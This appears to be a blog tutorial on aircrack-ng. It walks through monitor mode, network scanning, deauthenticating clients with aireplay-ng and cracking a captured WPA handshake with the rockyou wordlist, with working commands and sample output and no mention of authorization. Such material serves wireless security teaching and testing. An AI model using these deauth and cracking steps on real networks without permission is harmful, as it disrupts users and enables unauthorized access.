Getting Started with airmon-ng
This post will show how to get started using aircrack-ng to discover wi-fi networks, capture handshakes, deauth clients, and crack passwords.
Setup airmon-ng
Install aircrack-ng Suite
If you’re using Kali this should come pre-installed, but if not, you can install all the required tools using:
1
sudo apt install aircrack-ng
Monitor Mode
The first step will be to enable monitor mode on our wi-fi card. Assuming our wireless network adaptor is wlan0, we put our card into monitor mode using:
1
airmon-ng start wlan0
You should now have a new wireless network adaptor that has the same name with mon appended to the end. So our adaptor will be called wlan0mon.
Additionally, you made need to kill some processes that can cause issues. This can be done using:
1
airmon-ng check kill
Capturing Packets
Basic Capture
We can begin a basic capture and log the results. This will allow us to cycle through the wifi channels and discover Access Points and Clients.
1
airodump-ng -w wifiScan1 wlan0mon
-wspecifies the output files.- This ONLY listens on 2.4Ghz range.
From the above command you’ll see two separate tables. For the first table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP |
| ESSID | Name of the Wi-Fi Network |
| Beacons | Number of Beacon Frames received from the AP |
| CH | The current channel of the AP |
| ENC, CIPHER & AUTH | Encryption & Authentication details |
For the second table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP the client is communicating with |
| Station | MAC address of the client |
| Frames | Data Frames received from the client |
| Probes | Wi-Fi network the client is communicating with |
Advanced Capturing
After seeing what networks are around, we can target specific channels and ESSIDs. Let’s say our target wi-fi network is TestWifi, and is using channel 4.
1
airodump-ng -a -c 4 --essid "TestWifi" -w wifiScan2 wlan0mon
-aonly show associated clients-c 4only capture on channel 4--essid "TestWifi"only show APs with the ESSID of “TestWifi”
Sample output:
1
2
3
4
5
6
7
8
9
CH 4 ][ Elapsed: 1 min ][ 2022-02-05 12:06
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
11:22:33:44:55:66 -28 100 594 799 0 4 130 WPA2 CCMP PSK TestWifi
BSSID STATION PWR Rate Lost Frames Notes Probes
11:22:33:44:55:66 22:44:66:88:33:55 -41 12e-24 34 977 TestWifi
Because we are saving the output, there will be a capture file .cap included as part of this. However, unless a client connects while we are listening, we won’t have any handshakes recorded.
If there are already clients connected, we can attempt to forcible disconnect them and listen for the handshake when they re-connect.
Deauthing Users
While the previous command is running and we’re capturing handshakes , we can open another terminal and de-auth an AP, or a specific client connected to an AP.
Target an AP:
1
aireplay-ng -0 10 -a 11:22:33:44:55:66 wlan0mon
-0 10deauth mode and perform the deauth attack 10 times.-aMAC address of the AP.
Target a Client connected to an AP:
1
aireplay-ng -0 10 -a 11:22:33:44:55:66 -c 22:44:66:88:33:55 wlan0mon
-cMAC address of the client
After performing this attack, the capture should be left running for at least a few minutes to allow the clients to re-connect.
Crack Passwords
Assuming our attack was successful, we can analyse the output .cap file for handshakes and attempt to crack them offline. Let’s analyse the output file wifiScan2-01.cap from our previous capture and attempt to crack the password using the rockyou word list:
1
aircrack-ng wifiScan2-01.cap -w rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.
# BSSID ESSID Encryption
1 11:22:33:44:55:66 TestWifi WPA (1 handshake, with PMKID)
Choosing first network as target.
Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.
1 potential targets
- Normally you would be ask which target you want to crack, however, since there is only 1 it will automatically selected.
The cracking will now start:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Aircrack-ng 1.6
[00:00:04] 78245/14344391 keys tested (20290.49 k/s)
Time left: 11 minutes, 43 seconds 0.55%
Current passphrase: sukiyaki
Master Key : 23 17 DE 4E 8C FC 74 67 82 3F 04 E9 0A 22 CE 25
FD 01 FA DB 29 D2 3A 2C 79 F0 7D 05 36 DA 48 1B
Transient Key : E9 B7 AD 37 73 E5 A5 15 24 30 7A F0 64 AF 3B 14
EB 68 02 69 EE D2 C4 DF 80 C6 9F E6 11 00 E2 A8
FF 8A 66 56 85 AE FE B3 31 06 16 AC 6B 1A E1 DA
AB 21 AA 22 C9 9E 42 3E 3D ED 28 C1 F7 F1 AE E3
EAPOL HMAC : B8 16 E5 77 E5 AB BD B6 1A 3A 69 A3 19 1C 21 C4
The above attack is running at around 20 thousand keys per second. This is running on a Intel Core i7 8700. We can improve the performance a lot by using Hashcat instead of aircrack-ng to crack the password. You can read how to do that here.